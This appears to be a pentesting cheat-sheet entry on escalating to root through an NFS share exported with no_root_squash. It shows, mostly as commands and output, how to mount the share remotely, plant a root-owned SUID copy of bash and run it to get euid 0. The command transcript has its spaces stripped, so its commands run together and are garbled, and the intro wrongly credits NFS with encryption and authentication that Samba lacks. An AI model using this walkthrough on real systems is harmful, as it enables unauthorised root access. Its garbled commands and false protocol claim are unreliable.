Network File System or NFS is a file system protocol that allows users to share directories and files over a network. The NFS protocol is similar to the Samba protocol. However, unlike Samba, NFS provides an encryption mechanism and authentication. In addition, NFS server access is also restricted to specified hostnames and IP addresses.
no_root_squash privesc
By default, NFS shares change requests from the root user into the non-privileged user nfsnobody, the root privileges are "squashed". With no_root_squash configured requests are not "squashed", meaning any client that mount this directory can read, write and modify files within the directory as root on the host machine.
## Confirm that 'no_root_squash' is configured[lowPrivUser@victimHost nfs]$ cat /etc/exports/share/nfs*(rw,insecure,sync,no_subtree_check,no_root_squash)## Low privileged account isn't able to read nfs directory[lowPrivUser@victimHost share]$ ls -aldrwxr-xr-x7rootroot75Jun2308:56.dr-xr-xr-x.20rootroot278Aug252022..drwxr-x---2admUseradmUser189Feb192021nfs## Mount share from local attack machine➜/tmpmkdirpe➜/tmpmount-tnfsvictimHost:/share/nfs/tmp/pe➜/tmpcdpe➜pels-altotal5684drwxr-x---2voidvoid189Feb192021.drwxrwxrwt21rootroot69632Jul312:49..-rw-r--r--1voidvoid823Feb192021secret.conf## Change privileges of mounted share so lowPrivUser can copy /bin/bash to share➜/tmpchmod777pe[lowPrivUser@victimHost share]$ cd nfs[lowPrivUser@victimHost nfs]$ cp /bin/bash .## Change owner and set SUID bit on binary. Execute on victimHost to priesc➜pechmod+sbash➜pechownroot:rootbash[lowPrivUser@victimHost nfs]$ ./bash -pbash-4.4#iduid=1651499380(lowPrivUser) gid=1102800513(domainusers) euid=0(root) egid=0(root) groups=0(root)## Cleaning➜permbash➜pecd..➜/tmpchmod750pe💀➜/tmpumountpe